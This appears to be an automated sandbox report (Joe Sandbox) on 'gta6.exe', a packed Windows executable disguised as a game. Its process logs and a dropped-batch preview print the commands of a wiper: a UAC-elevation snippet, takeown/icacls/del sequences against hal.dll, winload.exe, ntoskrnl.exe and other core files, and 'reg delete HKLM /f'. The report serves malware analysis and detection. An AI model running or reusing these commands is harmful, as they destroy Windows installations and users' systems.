    Source: C:\Users\user\Desktop\gta6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /fJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts1
    Native API
    1
    Scripting
    11
    Process Injection
    1
    Modify Registry
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Services File Permissions Weakness
    1
    Services File Permissions Weakness
    2
    Virtualization/Sandbox Evasion
    LSASS Memory2
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    11
    Process Injection
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Obfuscated Files or Information
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Services File Permissions Weakness
    LSA Secrets11
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Software Packing
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1544786 Sample: gta6.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 72 19 Antivirus / Scanner detection for submitted sample 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 Yara detected UACMe UAC Bypass tool 2->23 25 2 other signatures 2->25 7 gta6.exe 8 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        process5 11 icacls.exe 1 9->11         started        13 takeown.exe 1 9->13         started        15 conhost.exe 9->15         started        17 20 other processes 9->17

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    gta6.exe37%ReversingLabs
    gta6.exe100%AviraHEUR/AGEN.1339739
    gta6.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1544786
    Start date and time:2024-10-29 18:41:07 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 23s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:42
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:gta6.exe
    Detection:MAL
    Classification:mal72.expl.winEXE@46/2@0/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 27
    • Number of non-executed functions: 37
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, smss.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtDeleteKey calls found.
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtOpenKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: gta6.exe
    No simulations
    No context
    No context
    No context
    No context
    No context
    Process:C:\Users\user\Desktop\gta6.exe
    File Type:ASCII text, with very long lines (331), with CRLF line terminators
    Category:dropped
    Size (bytes):2061
    Entropy (8bit):4.936877519380997
    Encrypted:false
    SSDEEP:24:14/otr9yRpFCXp5CDpinCHpZC2dOdfp7bCXp4nClsyp0GCnpenCR8YpCUCbp4CSX:aReX+DxHm2A1d+X7VKnxR8YU7bJSARDA
    MD5:786DBA0C5B6539CF40382E1D6A31941E
    SHA1:23DD0DFDBB1A2584744979A146346726B9577D9C
    SHA-256:0D539203223FB2A353189C36748EDBAD1C33ADE0158F72C3CA4B14DEC0AAFCDB
    SHA-512:7EA197C07AEB76B22FCF813D779A708680D98DC68E0117C46D637D88952EF686A87E329FCEC21B8D0D43860F3481611BFAB104E7390906486882890D57D3E4C3
    Malicious:false
    Preview:@shift /0..set "params=%*"..cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )..cd %SystemRoot%\System32....takeown /f %SystemRoot%\System32\hal.dll /r /d y..icacls %SystemRoot%\System32\hal.dll /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\hal.dll....takeown /f %SystemRoot%\System32\winload.exe /r /d y..icacls %SystemRoot%\System32\winload.exe /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\winload.exe....takeown /f %SystemRoot%\System32\winresume.exe /r /d y..icacls %SystemRoot%\System32\winresume.exe /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\winresume.exe....takeown /f %SystemRoot%\System32\winlogon.exe /r /d y..icacls %SystemRoot%\System32\winlogon.exe /grant everyone:F /
    Process:C:\Windows\System32\fsutil.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):4.17699200758583
    Encrypted:false
    SSDEEP:3:QAFrf2WwFhMjn:QgL2zhMj
    MD5:870D97F130F8CDC708141C407389BE3A
    SHA1:B869CF43CD47F97E9883A9538FB157F2F79F51DC
    SHA-256:2C09238165070B4B23C709CBF1FD749E0FB645EB64B4A8B189E5E3DB2CF2EF59
    SHA-512:BFC916325F759F95C68A59AAECB3DAF4DC5BDAB9BFDC48E817BDB5CA20BAFA355BD0699668BD63420E354751DC1116F4A50949BC4ECBA8E54644BAB10FED3099
    Malicious:false
    Preview:Volume - C: is NOT Dirty..
    File type:PE32+ executable (GUI) x86-64, for MS Windows
    Entropy (8bit):7.918912990185061
    TrID:
    • Win64 Executable GUI (202006/5) 81.25%
    • UPX compressed Win32 Executable (30571/9) 12.30%
    • Win64 Executable (generic) (12005/4) 4.83%
    • Generic Win/DOS Executable (2004/3) 0.81%
    • DOS Executable Generic (2002/1) 0.81%
    File name:gta6.exe
    File size:56'832 bytes
    MD5:aaff8d22681e8bdee3c3ba55007f673f
    SHA1:aa94b52ee5290629165387bb0e7bdf3600e7a073
    SHA256:512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb
    SHA512:7e097d80b931aaa992b47f76c01eaa7e13c95fcc9d62d0b899216e0309563f32a6b0cb609e4540d81f8a4d3590f7fa277c124d2d6430f9409cf8f5c43f15792a
    SSDEEP:1536:T4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNs2:T4dzVTaer344JzthRZijQ1Js
    TLSH:2843F1B797BDE8BDC02361B257CC0040BA6F262B57C4173F15A05AFFC89A2D49741752
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.........p..0G.........@.............................p.............................................
    Icon Hash:00928e8e8686b000
    Entrypoint:0x140024730
    Entrypoint Section:UPX1
    Digitally signed:false
    Imagebase:0x140000000
    Subsystem:windows gui
    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
    DLL Characteristics:
    Time Stamp:0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:a50e815adb2cfe3e58d388c791946db8
    Instruction
    push ebx
    push esi
    push edi
    push ebp
    dec eax
    lea esi, dword ptr [FFFF38EAh]
    dec eax
    lea edi, dword ptr [esi-00017025h]
    push edi
    mov eax, 00022A7Fh
    push eax
    dec eax
    mov ecx, esp
    dec eax
    mov edx, edi
    dec eax
    mov edi, esi
    mov esi, 0000C703h
    push ebp
    dec eax
    mov ebp, esp
    inc esp
    mov ecx, dword ptr [ecx]
    dec ecx
    mov eax, edx
    dec eax
    mov edx, esi
    dec eax
    lea esi, dword ptr [edi+02h]
    push esi
    mov al, byte ptr [edi]
    dec edx
    mov cl, al
    and al, 07h
    shr cl, 00000003h
    dec eax
    mov ebx, FFFFFD00h
    dec eax
    shl ebx, cl
    mov cl, al
    dec eax
    lea ebx, dword ptr [esp+ebx*2-00000E78h]
    dec eax
    and ebx, FFFFFFC0h
    push 00000000h
    dec eax
    cmp esp, ebx
    jne 00007F8D7C90708Bh
    push ebx
    dec eax
    lea edi, dword ptr [ebx+08h]
    mov cl, byte ptr [esi-01h]
    dec edx
    mov byte ptr [edi+02h], al
    mov al, cl
    shr cl, 00000004h
    mov byte ptr [edi+01h], cl
    and al, 0Fh
    mov byte ptr [edi], al
    dec eax
    lea ecx, dword ptr [edi-04h]
    push eax
    inc ecx
    push edi
    dec eax
    lea eax, dword ptr [edi+04h]
    inc ebp
    xor edi, edi
    inc ecx
    push esi
    inc ecx
    mov esi, 00000001h
    inc ecx
    push ebp
    inc ebp
    xor ebp, ebp
    inc ecx
    push esp
    push ebp
    push ebx
    dec eax
    mov dword ptr [esp-10h], ecx
    dec eax
    mov dword ptr [esp-28h], eax
    mov eax, 00000001h
    dec eax
    mov dword ptr [esp-08h], esi
    dec esp
    mov dword ptr [esp-18h], eax
    mov ebx, eax
    inc esp
    mov dword ptr [esp-1Ch], ecx
    movzx ecx, byte ptr [edi+02h]
    shl ebx, cl
    mov ecx, ebx
    dec eax
    mov ebx, dword ptr [esp+38h]
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x264c00x28c.rsrc
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x4c0.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10d4UPX1
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    UPX00x10000x170000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    UPX10x180000xe0000xd4004641914c8fe546eab049b77fbd27ef9bFalse0.97265625data7.97567805692808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x260000x10000x8009f4b424b130ce2bf08fb606d3e6b85a2False0.4453125data4.401923963390295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_RCDATA0x2221c0x803data1.0053632374451487
    RT_RCDATA0x22a200x1very short file (no magic)9.0
    RT_RCDATA0x22a240xcNon-ISO extended-ASCII text, with no line terminators1.6666666666666667
    RT_RCDATA0x22a300x12data1.5
    RT_MANIFEST0x262200x2a0XML 1.0 document, ASCII text, with very long lines (672), with no line terminators0.5520833333333334
    DLLImport
    COMCTL32.DLLInitCommonControlsEx
    GDI32.DLLGetStockObject
    KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
    msvcrt.dllfree
    OLE32.DLLCoInitialize
    SHELL32.DLLShellExecuteExW
    SHLWAPI.DLLPathRemoveArgsW
    USER32.DLLSetFocus
    WINMM.DLLtimeBeginPeriod
    No network behavior found

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:13:42:08
    Start date:29/10/2024
    Path:C:\Users\user\Desktop\gta6.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\gta6.exe"
    Imagebase:0x140000000
    File size:56'832 bytes
    MD5 hash:AAFF8D22681E8BDEE3C3BA55007F673F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Target ID:2
    Start time:13:42:08
    Start date:29/10/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
    Imagebase:0x7ff788900000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:3
    Start time:13:42:08
    Start date:29/10/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff75da10000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:4
    Start time:13:42:08
    Start date:29/10/2024
    Path:C:\Windows\System32\fsutil.exe
    Wow64 process (32bit):false
    Commandline:fsutil dirty query C:
    Imagebase:0x7ff7dba00000
    File size:214'840 bytes
    MD5 hash:DE00EDA7134D3365E6074700E3008CAD
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:5
    Start time:13:42:08
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\hal.dll /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:6
    Start time:13:42:08
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\hal.dll /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:8
    Start time:13:42:09
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):true
    Commandline:takeown /f C:\Windows\System32\winload.exe /r /d y
    Imagebase:0x650000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:9
    Start time:13:42:09
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\winload.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:12
    Start time:13:42:10
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\winresume.exe /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:13
    Start time:13:42:10
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:15
    Start time:13:42:10
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\winlogon.exe /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:17
    Start time:13:42:10
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:19
    Start time:13:42:10
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\wininit.exe /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:20
    Start time:13:42:10
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:21
    Start time:13:42:11
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
    Imagebase:0x7ff7b4ee0000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:22
    Start time:13:42:11
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:23
    Start time:13:42:11
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\regedit.exe /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:24
    Start time:13:42:11
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:25
    Start time:13:42:12
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\taskmgr.exe /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:26
    Start time:13:42:12
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:27
    Start time:13:42:12
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\consent.exe /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:28
    Start time:13:42:12
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\consent.exe /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:29
    Start time:13:42:12
    Start date:29/10/2024
    Path:C:\Windows\System32\takeown.exe
    Wow64 process (32bit):false
    Commandline:takeown /f C:\Windows\System32\drivers /r /d y
    Imagebase:0x7ff683660000
    File size:66'560 bytes
    MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:30
    Start time:13:42:13
    Start date:29/10/2024
    Path:C:\Windows\System32\icacls.exe
    Wow64 process (32bit):false
    Commandline:icacls C:\Windows\System32\drivers /grant everyone:F /t
    Imagebase:0x7ff6ae4b0000
    File size:39'424 bytes
    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:32
    Start time:13:42:14
    Start date:29/10/2024
    Path:C:\Windows\System32\reg.exe
    Wow64 process (32bit):false
    Commandline:reg delete HKLM /f
    Imagebase:0x7ff6e5600000
    File size:77'312 bytes
    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Reset < >

      Execution Graph

      Execution Coverage:12.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:7.6%
      Total number of Nodes:872
      Total number of Limit Nodes:31
